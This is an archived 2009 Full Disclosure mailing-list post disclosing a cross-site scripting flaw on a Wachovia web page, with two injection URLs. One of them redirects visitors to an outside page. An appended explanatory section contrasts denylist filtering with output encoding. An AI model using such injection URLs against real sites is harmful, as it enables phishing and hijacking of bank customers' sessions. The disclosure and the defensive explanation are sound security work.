
Full Disclosure mailing list archives
Wachovia Banking Wizard - XSS - PoC
From: Marshall Whittaker <marshallwhittaker () gmail com>
Date: Sun, 30 Aug 2009 08:33:09 -0500
This is only a proof of concept, please use this responsibly. This was reported to Wachovia on Aug 22, 2009 and still broken as of Aug 30 2009. Very simple standard cross site scripting exploit. As you can see, it works with HEX as well. Bad characters obviously aren't filtered correctly.

https://www.wachovia.com/foundation/forms/wizard/retireWizard.jsp?nextScreen=<script>document.write('%50%6F%43%20%62%79%20%6F%78%61%67%61%73%74')</script>

https://www.wachovia.com/foundation/forms/wizard/retireWizard.jsp?nextScreen=><script %0A%0D>window.location="http://mapdav.sourceforge.net/wchp/wchpw.html ";%3B</script>

--oxagast
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
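The post above makes two observations a defender should take from it: a "bad character" check that runs before the container percent-decodes the parameter never sees the hex form, and a tag-name denylist is defeated by whitespace inside the tag. The following is an added example, not code from the post or from Wachovia's application, and the denylist and reflection pattern are hypothetical; it contrasts that filtering approach with contextual output encoding, using constructed, benign inputs.

```javascript
// Added example (not from the original post). The real Wachovia code is not
// known; this models a plausible weak pattern and its fix.

// Hypothetical denylist applied to the RAW query value, before decoding.
const DENY = /<b>/i;
const BLOCKED = '<p>invalid</p>';

function denyListPasses(raw) {
  return !DENY.test(raw);
}

// What the server-side page actually receives after the container decodes %XX.
function decodeParam(raw) {
  return decodeURIComponent(raw);
}

// Vulnerable pattern: filter on the raw value, reflect the decoded value as HTML.
function renderVulnerable(raw) {
  if (!denyListPasses(raw)) return BLOCKED;
  return `<p>Next screen: ${decodeParam(raw)}</p>`;
}

// Hardened pattern: no denylist needed; encode the decoded value for HTML text.
function htmlEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

function renderHardened(raw) {
  return `<p>Next screen: ${htmlEncode(decodeParam(raw))}</p>`;
}

// Did the rendered page gain a <b ...> element it never intended to have?
// `<b \n\r>` is still a <b> start tag to a browser, so match on "<b" + space/">".
function injectsMarkup(html) {
  return /<b[\s>]/i.test(html);
}

// Constructed inputs: literal, percent-encoded, and whitespace-inside-tag forms.
const INPUTS = {
  literal: '<b>x</b>',
  hex: '%3Cb%3Ex%3C%2Fb%3E',
  whitespace: '<b %0A%0D>x</b>',
};
```

Only the literal form is stopped by the denylist; both variants reach the page, and only output encoding neutralises all three.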